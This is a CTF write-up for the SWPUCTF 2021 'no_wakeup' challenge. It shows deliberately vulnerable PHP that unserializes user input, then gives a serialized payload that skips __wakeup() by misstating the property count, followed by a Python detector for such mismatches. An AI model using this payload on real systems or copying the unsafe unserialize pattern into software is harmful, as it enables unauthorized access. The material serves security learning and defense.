
SWPUCTF 2021 新生赛 (Freshman Contest): no_wakeup

Write-ups of challenges I worked through on NSSCTF in high school


[SWPUCTF 2021 新生赛] no_wakeup: lamaper's write-up

Topics: deserialization, __wakeup() bypass

Opening the challenge reveals the source code:

<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin = "user";
        $this->passwd = "123456";
    }

    // Runs automatically when an object of this class is unserialized,
    // replacing whatever passwd the payload carried with its SHA-1 hash.
    public function __wakeup(){
        $this->passwd = sha1($this->passwd);
    }

    // Runs when the object is destroyed, whether or not __wakeup() ran.
    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "wllm"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->passwd;
            echo "No wake up";
        }
    }
}
$Letmeseesee = $_GET['p'];   // user-controlled input goes straight into unserialize()
unserialize($Letmeseesee);
?>

When the program calls unserialize() on line 29, __wakeup() is executed automatically, and __wakeup() clearly hashes the passwd carried in the uploaded serialized parameter. SHA-1 is a one-way hash, and there is currently no practical way to find a SHA-1 input that hashes to the required value, so the plan is to bypass __wakeup() altogether.

A PHP quirk: when the member count declared in a serialized object's property list does not match the number of members actually present, __wakeup() is skipped. So first construct the object normally:

// requires the HaHaHa class definition from class.php above
$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
$stus = serialize($aa);
print_r($stus);

which gives:

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

Change the declared property count from 2 to 3 to get:

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

Submit it as the p parameter and that's it.
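As an added example (my code, not part of the original write-up), here is a small Python parser for PHP's serialize() format that flags the trick used in this challenge: an object whose declared property count does not match the key/value pairs actually present. It handles the N, i, b, d, s, a and O types; the function names are mine, and the only payload values assumed are the ones shown above.

```python
def _read_int(s, i, stop):
    """Read digits from s[i] up to `stop`; return (value, index just past stop)."""
    end = s.index(stop, i)
    return int(s[i:end]), end + 1

def _parse(s, i, found):
    """Parse one value at s[i]; return (value, next index). Objects whose declared
    property count is wrong are appended to `found` as (class, declared, actual)."""
    t = s[i]
    if t == "N":                                   # null: N;
        return None, i + 2
    if t in "ibd":                                 # i:42;  b:1;  d:1.5;
        end = s.index(";", i)
        raw = s[i + 2:end]
        return (int(raw) if t == "i" else (raw == "1" if t == "b" else float(raw))), end + 1
    if t == "s":                                   # s:5:"admin";
        n, j = _read_int(s, i + 2, ":")
        val = s[j + 1:j + 1 + n]                   # skip the opening quote
        j += 1 + n
        if s[j:j + 2] != '";':
            raise ValueError("malformed string at offset %d" % i)
        return val, j + 2
    if t in "aO":                                  # a:2:{...}  or  O:6:"HaHaHa":2:{...}
        if t == "O":
            n, j = _read_int(s, i + 2, ":")
            name = s[j + 1:j + 1 + n]
            j += n + 3                             # past the closing quote and ':'
        else:
            name, j = None, i + 2
        declared, j = _read_int(s, j, ":")
        j += 1                                     # skip '{'
        items, actual = {}, 0
        while s[j] != "}":                         # count the key/value pairs actually present
            k, j = _parse(s, j, found)
            v, j = _parse(s, j, found)
            items[k] = v
            actual += 1
        if t == "O" and declared != actual:
            found.append((name, declared, actual))
        return ({"__class": name, **items} if t == "O" else items), j + 1
    raise ValueError("unsupported type %r at offset %d" % (t, i))

def count_mismatches(payload):
    """List (class, declared, actual) for every object in a PHP serialize() string
    whose declared property count is wrong; [] means the counts are consistent."""
    s = payload.encode("utf-8").decode("latin-1")  # one char per byte, as PHP counts lengths
    found = []
    _, end = _parse(s, 0, found)
    if end != len(s): raise ValueError("trailing data at offset %d" % end)
    return found
```

A non-empty result on a parameter that is about to reach unserialize() is a good reason to log and reject the request before PHP ever builds the object.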

This post is licensed under CC BY 4.0 by the author.